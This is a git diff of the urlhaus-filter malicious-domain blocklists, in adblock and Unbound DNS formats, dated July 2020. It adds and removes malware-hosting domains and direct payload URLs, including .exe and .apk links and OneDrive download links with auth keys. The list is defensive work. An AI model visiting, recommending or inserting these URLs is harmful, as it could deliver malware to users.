||mhkdhotbot.myvnc.com^ ||mhkdhotbot80.myvnc.com^ -||micahproducts.com^ ||micalle.com.au^ ||migmon.club^ ||mikrokaynakmerkezi.com^ @@ -1820,6 +1868,8 @@ ||mteng.mmj7.com^ ||mtfelektroteknik.com^ ||mueblesjcp.cl^ +||mutec.jp^ +||mv360.net^ ||mvb.kz^ ||mxpiqw.am.files.1drv.com^ ||mynydd-ednyfed-countryhouse.co.uk^ @@ -1830,12 +1880,17 @@ ||namuvpn.com^ ||narty.laserteam.pl^ ||nch.com.au/components/aacenc.exe$all +||ndrs.cloud^ ||nebraskacharters.com.au^ ||neocity1.free.fr^ ||nerve.untergrund.net^ ||news.omumusic.net^ ||newsun-shop.com^ +||newxing.com/D4894DD65482/server.exe$all ||newxing.com/DA38CBAAD124/Demo.exe$all +||newxing.com/DDB3AC763452/StandardPalette.exe$all +||newxing.com/d6c9a8a921847/prjfire.exe$all +||ngoaingu.garage.com.vn^ ||nofound.000webhostapp.com^ ||norperuinge.com.pe^ ||note.youdao.com/yws/api/personal/file/WEB3a243b322cf83ca7cae587a92916bac7?method=download&inline=true&shareKey=649ac0bb5d5b13d15cbf50b2609e193a$all @@ -1854,6 +1909,7 @@ ||onedrive.live.com/Download?cid=A1C8C8055848B889&resid=A1C8C8055848B889!111&authkey=AGZLFtSgr4LSpVo$all ||onedrive.live.com/download.aspx?authkey=!ANHBzyBkG3MeKig&cid=21757E11F03B2792&resid=21757E11F03B2792!109&parId=root&o=OneUp$all ||onedrive.live.com/download.aspx?authkey=%21AGZmMCN0fitqqSg&cid=B49DE58B11F93798&resid=B49DE58B11F93798%21107&parId=root&o=OneUp$all +||onedrive.live.com/download.aspx?authkey=%21ANHBzyBkG3MeKig&cid=21757E11F03B2792&resid=21757E11F03B2792%21109&parId=root&o=OneUp$all ||onedrive.live.com/download?&resid=81445407A9F44D37!197&authkey=APuZ15KfTzlRYSA$all ||onedrive.live.com/download?&resid=81445407A9F44D37!198&authkey=AGs5RGb15_esAqQ$all ||onedrive.live.com/download?&resid=B4C15A27928F663B!229&authkey=AIarm61FWmd_NPE$all @@ -1900,7 +1956,6 @@ ||onedrive.live.com/download?cid=0D59C202E35694C2&resid=D59C202E35694C2!274&authkey=ACQg0aKuTOXdpgo$all ||onedrive.live.com/download?cid=0D59C202E35694C2&resid=D59C202E35694C2%21273&authkey=AE2M69E5NU3RReA$all ||onedrive.live.com/download?cid=0D59C202E35694C2&resid=D59C202E35694C2%21274&authkey=ACQg0aKuTOXdpgo$all -||onedrive.live.com/download?cid=0F0A5AADC4C3C242&resid=F0A5AADC4C3C242!309&authkey=ALFe36DRAi1zmWc$all ||onedrive.live.com/download?cid=0F0A5AADC4C3C242&resid=F0A5AADC4C3C242%21309&authkey=ALFe36DRAi1zmWc$all ||onedrive.live.com/download?cid=0F51D04C9D556964&resid=F51D04C9D556964%21123&authkey=ACo5hiwPPfQ8VRw$all ||onedrive.live.com/download?cid=0F51D04C9D556964&resid=F51D04C9D556964%21124&authkey=AI6sfa2Z-kqf6X0$all @@ -1917,11 +1972,11 @@ ||onedrive.live.com/download?cid=1A162E8FCAAEF5FA&resid=1A162E8FCAAEF5FA%215495&authkey=AIc7rmJ1Cm3rt2w$all ||onedrive.live.com/download?cid=1C14977B48A91558&resid=1C14977B48A91558!8182&authkey=AAUTw8TVZXr5v3A$all ||onedrive.live.com/download?cid=1C14977B48A91558&resid=1C14977B48A91558%218182&authkey=AAUTw8TVZXr5v3A$all +||onedrive.live.com/download?cid=1DBDF62BC3C2B05B&resid=1DBDF62BC3C2B05B!134&authkey=APe6BHxn7c89z60$all ||onedrive.live.com/download?cid=1F48501EE4E8735A&resid=1F48501EE4E8735A%215268&authkey=ADvGIHzJzelVkdg$all ||onedrive.live.com/download?cid=208DCE306FA91736&resid=208DCE306FA91736%21184&authkey=AE6L_lmEQbcWQS4$all ||onedrive.live.com/download?cid=208DCE306FA91736&resid=208DCE306FA91736%21185&authkey=ABpInbsiqu9KJ0c$all ||onedrive.live.com/download?cid=21757E11F03B2792&resid=21757E11F03B2792!109&authkey=!ANHBzyBkG3MeKig$all -||onedrive.live.com/download?cid=22DE7FE70990A7F4&resid=22DE7FE70990A7F4!185&authkey=ALxzoQx-dTHHDBc$all ||onedrive.live.com/download?cid=22DE7FE70990A7F4&resid=22DE7FE70990A7F4%21185&authkey=ALxzoQx-dTHHDBc$all ||onedrive.live.com/download?cid=24EF9E675B079AF9&resid=24EF9E675B079AF9%21154&authkey=ALKJIkPdfXvM8po$all ||onedrive.live.com/download?cid=24EF9E675B079AF9&resid=24EF9E675B079AF9%21155&authkey=AFU-yAx_GXXDdOE$all @@ -1935,7 +1990,6 @@ ||onedrive.live.com/download?cid=2C38C37ED8430789&resid=2C38C37ED8430789%21115&authkey=AGLzNnSx71tBe9E$all ||onedrive.live.com/download?cid=2CBD310015BC2D37&resid=2CBD310015BC2D37!183&authkey=AKon9I9zzHusiUk$all ||onedrive.live.com/download?cid=2CBD310015BC2D37&resid=2CBD310015BC2D37%21183&authkey=AKon9I9zzHusiUk$all -||onedrive.live.com/download?cid=2F4D6884E933CB1A&resid=2F4D6884E933CB1A!116&authkey=!ABWlEdjhFsqWaP4$all ||onedrive.live.com/download?cid=2F4D6884E933CB1A&resid=2F4D6884E933CB1A!121&authkey=!AA0qbUUSS-wb13w$all ||onedrive.live.com/download?cid=2F947402293C14C1&resid=2F947402293C14C1!119&authkey=APMAkX2CQB9rImU$all ||onedrive.live.com/download?cid=2F947402293C14C1&resid=2F947402293C14C1%21118&authkey=ACrL2Iiem-ZJer8$all @@ -1961,7 +2015,6 @@ ||onedrive.live.com/download?cid=409B9A5B5F0F876C&resid=409B9A5B5F0F876C!3158&authkey=AFq3QvVGT_2AeVQ$all ||onedrive.live.com/download?cid=409B9A5B5F0F876C&resid=409B9A5B5F0F876C!3269&authkey=AOMJLbubQ7aUcvE$all ||onedrive.live.com/download?cid=409B9A5B5F0F876C&resid=409B9A5B5F0F876C%213269&authkey=AOMJLbubQ7aUcvE$all -||onedrive.live.com/download?cid=41F2978DA9CE0256&resid=41F2978DA9CE0256!111&authkey=AJZp62LMPZKHUMQ$all ||onedrive.live.com/download?cid=41F2978DA9CE0256&resid=41F2978DA9CE0256!113&authkey=AEOaNIW0sQpOAcU$all ||onedrive.live.com/download?cid=41F2978DA9CE0256&resid=41F2978DA9CE0256!120&authkey=AJFZZ_HBF2UlaSk$all ||onedrive.live.com/download?cid=41F2978DA9CE0256&resid=41F2978DA9CE0256%21111&authkey=AJZp62LMPZKHUMQ$all @@ -1980,7 +2033,6 @@ ||onedrive.live.com/download?cid=48D9F176EC6CB212&resid=48D9F176EC6CB212!197&authkey=ALKUgj0F2tQA8sw$all ||onedrive.live.com/download?cid=48ED7695F8804D66&resid=48ED7695F8804D66!13805&authkey=AE-zbfo2uwln_Gg$all ||onedrive.live.com/download?cid=48ED7695F8804D66&resid=48ED7695F8804D66!13806&authkey=AAkIQ-ymRJjodNs$all -||onedrive.live.com/download?cid=48ED7695F8804D66&resid=48ED7695F8804D66%2113805&authkey=AE-zbfo2uwln_Gg$all ||onedrive.live.com/download?cid=48ED7695F8804D66&resid=48ED7695F8804D66%2113806&authkey=AAkIQ-ymRJjodNs$all ||onedrive.live.com/download?cid=4B676EA3FF139B93&resid=4B676EA3FF139B93!133&authkey=AMfIx63GLyTFLGo$all ||onedrive.live.com/download?cid=4D4D07581D39B63D&resid=4D4D07581D39B63D%21127&authkey=ABLG20R-Aat_ob4$all @@ -2023,12 +2075,12 @@ ||onedrive.live.com/download?cid=501B63131AB62DD6&resid=501B63131AB62DD6%212725&authkey=AANRZ9ET3bYM3lc$all ||onedrive.live.com/download?cid=501B63131AB62DD6&resid=501B63131AB62DD6%212728&authkey=AHSMBKLtfRWgqjc$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C!395&authkey=ALWvuB_YHtOgJXw$all -||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C!398&authkey=ABAA_TJd7OHh4So$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C!406&authkey=AARnp48wUMgu6TQ$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C!415&authkey=AGLZsD6-G0NzJ7s$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C!420&authkey=AKk5DROUng_eCWw$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C!440&authkey=AI7-dpR11WNzyQ8$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C%21395&authkey=ALWvuB_YHtOgJXw$all +||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C%21398&authkey=ABAA_TJd7OHh4So$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C%21406&authkey=AARnp48wUMgu6TQ$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C%21415&authkey=AGLZsD6-G0NzJ7s$all ||onedrive.live.com/download?cid=505BE76830F4DC4C&resid=505BE76830F4DC4C%21420&authkey=AKk5DROUng_eCWw$all @@ -2140,7 +2192,6 @@ ||onedrive.live.com/download?cid=78BFB08E0F7BC86F&resid=78BFB08E0F7BC86F%21111&authkey=AGGNhgqj6UhXm2w$all ||onedrive.live.com/download?cid=78BFB08E0F7BC86F&resid=78BFB08E0F7BC86F%21112&authkey=ABsER1XtkPb3-tA$all ||onedrive.live.com/download?cid=78BFB08E0F7BC86F&resid=78BFB08E0F7BC86F%21117&authkey=AIvf1dDcVVu22eM$all -||onedrive.live.com/download?cid=7A5E689DD1DC641F&resid=7A5E689DD1DC641F!119&authkey=AOzJAi26IzpRqto$all ||onedrive.live.com/download?cid=7A5E689DD1DC641F&resid=7A5E689DD1DC641F!120&authkey=AJj7uEqJvobgFUM$all ||onedrive.live.com/download?cid=7A5E689DD1DC641F&resid=7A5E689DD1DC641F%21119&authkey=AOzJAi26IzpRqto$all ||onedrive.live.com/download?cid=7A5E689DD1DC641F&resid=7A5E689DD1DC641F%21120&authkey=AJj7uEqJvobgFUM$all @@ -2217,7 +2268,6 @@ ||onedrive.live.com/download?cid=AB8A3EC6FA75627D&resid=AB8A3EC6FA75627D!107&authkey=ALE99zlQrmaN_sk$all ||onedrive.live.com/download?cid=AE28961C75435487&resid=AE28961C75435487%21106&authkey=ALPH5aWcis8R9iw$all ||onedrive.live.com/download?cid=AE80108520D75992&resid=AE80108520D75992!113&authkey=AGH9q_ZzYJjcsPc$all -||onedrive.live.com/download?cid=AE80108520D75992&resid=AE80108520D75992%21113&authkey=AGH9q_ZzYJjcsPc$all ||onedrive.live.com/download?cid=AF84EBF13DD5499C&resid=AF84EBF13DD5499C!167&authkey=ANqr_YVN_Hdh2_E$all ||onedrive.live.com/download?cid=B03EE17D51411308&resid=B03EE17D51411308!2152&authkey=ABuTaAC83l5UTKs$all ||onedrive.live.com/download?cid=B03EE17D51411308&resid=B03EE17D51411308%212152&authkey=ABuTaAC83l5UTKs$all @@ -2234,17 +2284,16 @@ ||onedrive.live.com/download?cid=B3A118354E81D1BB&resid=B3A118354E81D1BB%21143&authkey=AHs21WNSQB_VU9w$all ||onedrive.live.com/download?cid=B49DE58B11F93798&resid=B49DE58B11F93798!107&authkey=!AGZmMCN0fitqqSg$all ||onedrive.live.com/download?cid=B50C4248502103D0&resid=B50C4248502103D0%21107&authkey=ALF1nlEy7JA4dBQ$all -||onedrive.live.com/download?cid=B5EA8D4249D866E6&resid=B5EA8D4249D866E6!164&authkey=ADFsfCDAw3bIboY$all ||onedrive.live.com/download?cid=B5EA8D4249D866E6&resid=B5EA8D4249D866E6%21164&authkey=ADFsfCDAw3bIboY$all ||onedrive.live.com/download?cid=B7CB31DB66675EB4&resid=B7CB31DB66675EB4%21922&authkey=AGHAYyUCvWey7Lg$all ||onedrive.live.com/download?cid=B8BA73DB68DA7C0B&resid=B8BA73DB68DA7C0B!7521&authkey=ABLT9zDyq2D4rb0$all ||onedrive.live.com/download?cid=B8BA73DB68DA7C0B&resid=B8BA73DB68DA7C0B%217521&authkey=ABLT9zDyq2D4rb0$all ||onedrive.live.com/download?cid=BEAF30DA1F621C9B&resid=BEAF30DA1F621C9B!246&authkey=AFyrcHdutALpu90$all +||onedrive.live.com/download?cid=BEAF30DA1F621C9B&resid=BEAF30DA1F621C9B%21246&authkey=AFyrcHdutALpu90$all ||onedrive.live.com/download?cid=C121261804708478&resid=C121261804708478%214199&authkey=ADgqe8QiYu92bQM$all ||onedrive.live.com/download?cid=C121261804708478&resid=C121261804708478%214200&authkey=ADQTJu8i3NmlGAI$all ||onedrive.live.com/download?cid=C121261804708478&resid=C121261804708478%214201&authkey=AHqbeR27S7GG8Kk$all ||onedrive.live.com/download?cid=C359B1A8BABC6019&resid=C359B1A8BABC6019!1251&authkey=ACt34EIZpzJUGfA$all -||onedrive.live.com/download?cid=C359B1A8BABC6019&resid=C359B1A8BABC6019%211251&authkey=ACt34EIZpzJUGfA$all ||onedrive.live.com/download?cid=C3D8AD85BA2ADD4E&resid=C3D8AD85BA2ADD4E!1337&authkey=AFNVu1FsUCZHT5E$all ||onedrive.live.com/download?cid=C3D8AD85BA2ADD4E&resid=C3D8AD85BA2ADD4E!1338&authkey=AJNgAmbOsWs75_c$all ||onedrive.live.com/download?cid=C3D8AD85BA2ADD4E&resid=C3D8AD85BA2ADD4E!1340&authkey=AL1Ay3FbTUde6D8$all @@ -2273,7 +2322,6 @@ ||onedrive.live.com/download?cid=CF0C6D1A4C15233D&resid=CF0C6D1A4C15233D!742&authkey=AKbXJu17f8g0R2s$all ||onedrive.live.com/download?cid=CF0C6D1A4C15233D&resid=CF0C6D1A4C15233D!744&authkey=ADaK4Zftd0YHHHs$all ||onedrive.live.com/download?cid=CF0C6D1A4C15233D&resid=CF0C6D1A4C15233D%21742&authkey=AKbXJu17f8g0R2s$all -||onedrive.live.com/download?cid=CF0C6D1A4C15233D&resid=CF0C6D1A4C15233D%21744&authkey=ADaK4Zftd0YHHHs$all ||onedrive.live.com/download?cid=D06D60404544FB85&resid=D06D60404544FB85!872&authkey=AP9HcHZTYWO8ZUo$all ||onedrive.live.com/download?cid=D06D60404544FB85&resid=D06D60404544FB85!874&authkey=ALKzCbXZ-dSCGuM$all ||onedrive.live.com/download?cid=D06D60404544FB85&resid=D06D60404544FB85!875&authkey=AKa55YbDhQNOC6c$all @@ -2301,10 +2349,8 @@ ||onedrive.live.com/download?cid=DD0A0EC58F4AC5F5&resid=DD0A0EC58F4AC5F5!7530&authkey=AM9p2ic6ZdKGFmY$all ||onedrive.live.com/download?cid=DD0A0EC58F4AC5F5&resid=DD0A0EC58F4AC5F5!7532&authkey=AOnjnUBQUVOn_Uk$all ||onedrive.live.com/download?cid=DD0A0EC58F4AC5F5&resid=DD0A0EC58F4AC5F5%217527&authkey=AIPYBiPwHt56um8$all -||onedrive.live.com/download?cid=DD0A0EC58F4AC5F5&resid=DD0A0EC58F4AC5F5%217530&authkey=AM9p2ic6ZdKGFmY$all ||onedrive.live.com/download?cid=DD0A0EC58F4AC5F5&resid=DD0A0EC58F4AC5F5%217532&authkey=AOnjnUBQUVOn_Uk$all ||onedrive.live.com/download?cid=DDCB86D2856E53D7&resid=DDCB86D2856E53D7%21281&authkey=AHG8d5eV8whKScU&em=2$all -||onedrive.live.com/download?cid=DDE26285195864B8&resid=DDE26285195864B8!361&authkey=AEqVkIEs2uV-tMI$all ||onedrive.live.com/download?cid=DDE26285195864B8&resid=DDE26285195864B8!366&authkey=ALy44awv_tX2O5M$all ||onedrive.live.com/download?cid=DDE26285195864B8&resid=DDE26285195864B8!379&authkey=AI9JeFVwfv5qi4M$all ||onedrive.live.com/download?cid=DDE26285195864B8&resid=DDE26285195864B8%21361&authkey=AEqVkIEs2uV-tMI$all @@ -2337,10 +2383,11 @@ ||onedrive.live.com/download?cid=EBACCA5DEC27FD20&resid=EBACCA5DEC27FD20%2118735&authkey=AJFYL1mzidnYLC8$all ||onedrive.live.com/download?cid=EDD7401A7180B54C&resid=EDD7401A7180B54C%21113&authkey=AOvAvPMOKd2jRns$all ||onedrive.live.com/download?cid=EDD7401A7180B54C&resid=EDD7401A7180B54C%21116&authkey=AAdNJ5xYfASUgu8$all +||onedrive.live.com/download?cid=EFDF2C8D834A1928&resid=EFDF2C8D834A1928!202&authkey=AH1gjQ8j29DArW4$all ||onedrive.live.com/download?cid=EFDF2C8D834A1928&resid=EFDF2C8D834A1928!203&authkey=AF8Xr99mRQP8Um8$all ||onedrive.live.com/download?cid=EFDF2C8D834A1928&resid=EFDF2C8D834A1928!204&authkey=AD0NbZlscbg-0sA$all ||onedrive.live.com/download?cid=EFDF2C8D834A1928&resid=EFDF2C8D834A1928%21202&authkey=AH1gjQ8j29DArW4$all -||onedrive.live.com/download?cid=EFDF2C8D834A1928&resid=EFDF2C8D834A1928%21203&authkey=AF8Xr99mRQP8Um8$all +||onedrive.live.com/download?cid=EFDF2C8D834A1928&resid=EFDF2C8D834A1928%21204&authkey=AD0NbZlscbg-0sA$all ||onedrive.live.com/download?cid=F05E45800A084E63&resid=F05E45800A084E63%21489&authkey=ADs_gFf3tjkD0w0$all ||onedrive.live.com/download?cid=F05E45800A084E63&resid=F05E45800A084E63%21490&authkey=AJ_RLd7XOoGE6aw$all ||onedrive.live.com/download?cid=F05E45800A084E63&resid=F05E45800A084E63%21492&authkey=AHdB75pTd1_UC8E$all @@ -2407,7 +2454,6 @@ ||pedidoslalacteo.com.ar^ ||perfectshinehair.co.uk^ ||ph4s.ru^ -||phamchilong.com^ ||phudieusongma.com^ ||pink99.com^ ||pinkbroadband.in/images/blog/Thumb.bin$all @@ -2417,7 +2463,6 @@ ||prestigehomeautomation.net^ ||probost.cz^ ||prosoc.nl^ -||protestlabsmovings.es^ ||prowin.co.th^ ||prozipper.s3.eu-central-1.amazonaws.com/prozipperRed.exe$all ||pujashoppe.in^ @@ -2462,7 +2507,6 @@ ||rusch.nu^ ||s.51shijuan.com^ ||s.kk30.com^ -||s289428.smrtp.ru^ ||saboorjaam.ir^ ||sadiqgill.com^ ||sahathaikasetpan.com^ @@ -2486,6 +2530,7 @@ ||sindicato1ucm.cl^ ||sites.google.com/site/stormqk/dn/StormAgent.apk?attredirects=0$all ||skyscan.com^ +||sl9XA73g7u3EO07WT42n7f4vIn5fZH.biz^ ||small-business-solutions.biz^ ||small.962.net^ ||smccycles.com^ @@ -2526,8 +2571,8 @@ ||symanreni.mysecondarydns.com^ ||szxypt.com^ ||t.honker.info^ -||tandenblekenhoofddorp.nl^ ||tattooartcreations.com^ +||taxpos.com^ ||tcy.198424.com^ ||tehrenberg.com^ ||telescopelms.com^ @@ -2540,20 +2585,22 @@ ||theprestige.ro^ ||theptiendat.com^ ||therecruiter.io^ +||thorn-bikes.com^ ||thosewebbs.com^ ||tianangdep.com^ ||tibinst.mefound.com^ ||tibok.lflink.com^ ||tishreycarmelim.co.il^ +||tldrbox.top/6$all ||tonydong.com^ ||tonyzone.com^ ||totebarreto.com.br^ +||tribunal.ug^ ||tsd.jxwan.com^ ||tulli.info^ ||tuneup.ibk.me^ ||tutuler.com^ ||uc-56.ru^ -||ucto-id.cz^ ||ugc.wegame.com.cn^ ||ukks.net^ ||ukronet.ru^ @@ -2568,14 +2615,17 @@ ||users.skynet.be/crisanar/defis/JEK_crackme1.7.zip$all ||uskeba.ca^ ||usmadetshirts.com^ +||uytgvhdfsdxc.ug^ ||vadyur.github.io^ ||valedchap.ir^ ||valencaagora.com.br^ ||vaziri.echobit.ir^ +||veyron.ir^ ||vfocus.net^ ||videoswebcammsn.free.fr^ ||vitinhvnt.com^ ||w.zhzy999.net/images/m.exe$all +||wap.dosame.com^ ||warriorllc.com^ ||wbd.5636.com^ ||web.mit.edu/kolya/.f/root/net.mit.edu/net/user/chris/WinNT/MIT_Agenda2a.doc$all @@ -2600,7 +2650,6 @@ ||www2.recepty5.com^ ||x2vn.com^ ||xantinas.com^ -||xpodip.ir^ ||xtremeforumz.com^ ||yeez.net^ ||yesky.51down.org.cn^ @@ -2611,6 +2660,9 @@ ||zagruz.dnset.com^ ||zagruz.toh.info^ ||zagruz.zyns.com^ +||zaragoza.co.ug^ +||zaragozsa.ug^ +||zd4b.lonlyfafner.ru^ ||zdy.17110.com^ ||zeytinyagisabun.com^ ||zhetysu360.kz^ diff --git a/urlhaus-filter-unbound-online.conf b/urlhaus-filter-unbound-online.conf index 8f91d990..22215d83 100644 --- a/urlhaus-filter-unbound-online.conf +++ b/urlhaus-filter-unbound-online.conf @@ -1,5 +1,5 @@ # Title: Online Malicious Domains Unbound Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -14,6 +14,7 @@ local-zone: "7th-club.com" always_nxdomain local-zone: "a-reality.co.uk" always_nxdomain local-zone: "abass.ir" always_nxdomain local-zone: "accessyouraudience.com" always_nxdomain +local-zone: "acteon.com.ar" always_nxdomain local-zone: "activecost.com.au" always_nxdomain local-zone: "admaris.ir" always_nxdomain local-zone: "admin.foa.ae" always_nxdomain @@ -23,6 +24,8 @@ local-zone: "aite.me" always_nxdomain local-zone: "al-wahd.com" always_nxdomain local-zone: "alacatibisiklet.com" always_nxdomain local-zone: "alba1004.co.kr" always_nxdomain +local-zone: "alexliasko.co.ug" always_nxdomain +local-zone: "alexliasko.ug" always_nxdomain local-zone: "algorithmshargh.com" always_nxdomain local-zone: "allloveseries.com" always_nxdomain local-zone: "alohasoftware.net" always_nxdomain @@ -49,6 +52,7 @@ local-zone: "azmeasurement.com" always_nxdomain local-zone: "azzd.co.kr" always_nxdomain local-zone: "b.frefou.ru" always_nxdomain local-zone: "babaroadways.in" always_nxdomain +local-zone: "backgrounds.pk" always_nxdomain local-zone: "bamakobleach.free.fr" always_nxdomain local-zone: "bangkok-orchids.com" always_nxdomain local-zone: "bapo.granudan.cn" always_nxdomain @@ -67,7 +71,6 @@ local-zone: "c.vvvvvvvvv.ga" always_nxdomain local-zone: "cameli.vn" always_nxdomain local-zone: "cameraforce.tv" always_nxdomain local-zone: "cbk.m.dodo52.com" always_nxdomain -local-zone: "cdn-10049480.file.myqcloud.com" always_nxdomain local-zone: "cellas.sk" always_nxdomain local-zone: "cf.uuu9.com" always_nxdomain local-zone: "cfs5.tistory.com" always_nxdomain @@ -82,16 +85,13 @@ local-zone: "chuckweiss.com" always_nxdomain local-zone: "cjto.top" always_nxdomain local-zone: "ckl6767.com" always_nxdomain local-zone: "clearwaterriveroutfitting.com" always_nxdomain -local-zone: "colourcreative.co.za" always_nxdomain local-zone: "commaa.com" always_nxdomain local-zone: "complan.hu" always_nxdomain local-zone: "complanbt.hu" always_nxdomain local-zone: "comtechadsl.com" always_nxdomain -local-zone: "config.cqhbkjzx.com" always_nxdomain local-zone: "config.kuaisousou.top" always_nxdomain -local-zone: "config.wwmhdq.com" always_nxdomain +local-zone: "config.younoteba.top" always_nxdomain local-zone: "cqjcc.org" always_nxdomain -local-zone: "crc2k18.mooo.com" always_nxdomain local-zone: "crisalic.fr" always_nxdomain local-zone: "crittersbythebay.com" always_nxdomain local-zone: "csnserver.com" always_nxdomain @@ -104,6 +104,7 @@ local-zone: "d9.99ddd.com" always_nxdomain local-zone: "da.alibuf.com" always_nxdomain local-zone: "danielbastos.com" always_nxdomain local-zone: "darco.pk" always_nxdomain +local-zone: "data.kaoyany.top" always_nxdomain local-zone: "data.over-blog-kiwi.com" always_nxdomain local-zone: "datapolish.com" always_nxdomain local-zone: "datvensaigon.com" always_nxdomain @@ -162,13 +163,13 @@ local-zone: "download.zjsyawqj.cn" always_nxdomain local-zone: "download301.wanmei.com" always_nxdomain local-zone: "dpeasesummithilltoppers.pbworks.com" always_nxdomain local-zone: "drools-moved.46999.n3.nabble.com" always_nxdomain +local-zone: "dudulm.com" always_nxdomain local-zone: "dw.58wangdun.com" always_nxdomain local-zone: "dx.qqyewu.com" always_nxdomain local-zone: "dx1.qqtn.com" always_nxdomain local-zone: "dx2.qqtn.com" always_nxdomain local-zone: "dzinestudio87.co.uk" always_nxdomain local-zone: "e.dangeana.com" always_nxdomain -local-zone: "ecoshore.ga" always_nxdomain local-zone: "edicolanazionale.it" always_nxdomain local-zone: "elokshinproperty.co.za" always_nxdomain local-zone: "emadamini.co.za" always_nxdomain @@ -183,6 +184,7 @@ local-zone: "expdom.ru" always_nxdomain local-zone: "ezfintechcorp.com" always_nxdomain local-zone: "fatherchildless.com" always_nxdomain local-zone: "fidiag.kymco.com" always_nxdomain +local-zone: "files.fqapps.com" always_nxdomain local-zone: "files.rakbot.ru" always_nxdomain local-zone: "files6.uludagbilisim.com" always_nxdomain local-zone: "fishingbigstore.com" always_nxdomain @@ -191,6 +193,7 @@ local-zone: "fkd.derpcity.ru" always_nxdomain local-zone: "fotobooth.at" always_nxdomain local-zone: "frin.ng" always_nxdomain local-zone: "fstation.dynu.net" always_nxdomain +local-zone: "fte.m.dodo52.com" always_nxdomain local-zone: "ftpftpftp.com" always_nxdomain local-zone: "funletters.net" always_nxdomain local-zone: "fusionfiresolutions.com" always_nxdomain @@ -208,6 +211,7 @@ local-zone: "go.xsuad.com" always_nxdomain local-zone: "gothw.club" always_nxdomain local-zone: "grafchekloder.rebatesrule.net" always_nxdomain local-zone: "greattastesmb.ca" always_nxdomain +local-zone: "greenpalace.top" always_nxdomain local-zone: "gssgroups.com" always_nxdomain local-zone: "gvpcdpgc.edu.in" always_nxdomain local-zone: "habbotips.free.fr" always_nxdomain @@ -220,7 +224,9 @@ local-zone: "herrdangwerder.de" always_nxdomain local-zone: "hfsoftware.cl" always_nxdomain local-zone: "hldschool.com" always_nxdomain local-zone: "hmbwgroup.com" always_nxdomain +local-zone: "hoayeuthuong-my.sharepoint.com" always_nxdomain local-zone: "hostzaa.com" always_nxdomain +local-zone: "hotart.co.nz" always_nxdomain local-zone: "hotel-le-relais-des-moulins.com" always_nxdomain local-zone: "housewifes.co" always_nxdomain local-zone: "hseda.com" always_nxdomain @@ -232,10 +238,12 @@ local-zone: "impression-gobelet.com" always_nxdomain local-zone: "inapadvance.com" always_nxdomain local-zone: "incrediblepixels.com" always_nxdomain local-zone: "incredicole.com" always_nxdomain +local-zone: "inigbiseijfji.ru" always_nxdomain local-zone: "intersel-idf.org" always_nxdomain local-zone: "isso.ps" always_nxdomain local-zone: "itd.m.dodo52.com" always_nxdomain local-zone: "jamiekaylive.com" always_nxdomain +local-zone: "jamshed.pk" always_nxdomain local-zone: "jansen-heesch.nl" always_nxdomain local-zone: "janvierassocies.fr" always_nxdomain local-zone: "javatank.ru" always_nxdomain @@ -246,16 +254,16 @@ local-zone: "jsq.m.dodo52.com" always_nxdomain local-zone: "jsya.co.kr" always_nxdomain local-zone: "jutvac.com" always_nxdomain local-zone: "jvalert.com" always_nxdomain +local-zone: "k.ludong.tv" always_nxdomain local-zone: "kachsurf.mylftv.com" always_nxdomain local-zone: "kamasu11.cafe24.com" always_nxdomain -local-zone: "kankalarnetwork.duckdns.org" always_nxdomain local-zone: "kanok.co.th" always_nxdomain +local-zone: "kanorkanor23.ru" always_nxdomain local-zone: "karavantekstil.com" always_nxdomain local-zone: "kdsp.co.kr" always_nxdomain local-zone: "kejpa.com" always_nxdomain local-zone: "kjbm9.mof.gov.cn" always_nxdomain local-zone: "kjcpromo.com" always_nxdomain -local-zone: "kleinendeli.co.za" always_nxdomain local-zone: "knightsbridgeenergy.com.ng" always_nxdomain local-zone: "kwanfromhongkong.com" always_nxdomain local-zone: "lameguard.ru" always_nxdomain @@ -283,10 +291,11 @@ local-zone: "lvr.samacomplus.com" always_nxdomain local-zone: "m.0757kd.cn" always_nxdomain local-zone: "m93701t2.beget.tech" always_nxdomain local-zone: "mackleyn.com" always_nxdomain +local-zone: "mammalson.com" always_nxdomain local-zone: "maringareservas.com.br" always_nxdomain local-zone: "marketinfosales.com" always_nxdomain local-zone: "marketprice.com.ng" always_nxdomain -local-zone: "mattayom31.go.th" always_nxdomain +local-zone: "marksidfgs.ug" always_nxdomain local-zone: "mazury4x4.pl" always_nxdomain local-zone: "mbgrm.com" always_nxdomain local-zone: "medianews.ge" always_nxdomain @@ -305,7 +314,6 @@ local-zone: "mfevr.com" always_nxdomain local-zone: "mffyjcdn.btgame.com" always_nxdomain local-zone: "mhkdhotbot.myvnc.com" always_nxdomain local-zone: "mhkdhotbot80.myvnc.com" always_nxdomain -local-zone: "micahproducts.com" always_nxdomain local-zone: "micalle.com.au" always_nxdomain local-zone: "migmon.club" always_nxdomain local-zone: "mikrokaynakmerkezi.com" always_nxdomain @@ -326,6 +334,8 @@ local-zone: "msecurity.ro" always_nxdomain local-zone: "mteng.mmj7.com" always_nxdomain local-zone: "mtfelektroteknik.com" always_nxdomain local-zone: "mueblesjcp.cl" always_nxdomain +local-zone: "mutec.jp" always_nxdomain +local-zone: "mv360.net" always_nxdomain local-zone: "mvb.kz" always_nxdomain local-zone: "mxpiqw.am.files.1drv.com" always_nxdomain local-zone: "mynydd-ednyfed-countryhouse.co.uk" always_nxdomain @@ -335,11 +345,13 @@ local-zone: "mytrains.net" always_nxdomain local-zone: "mywp.asia" always_nxdomain local-zone: "namuvpn.com" always_nxdomain local-zone: "narty.laserteam.pl" always_nxdomain +local-zone: "ndrs.cloud" always_nxdomain local-zone: "nebraskacharters.com.au" always_nxdomain local-zone: "neocity1.free.fr" always_nxdomain local-zone: "nerve.untergrund.net" 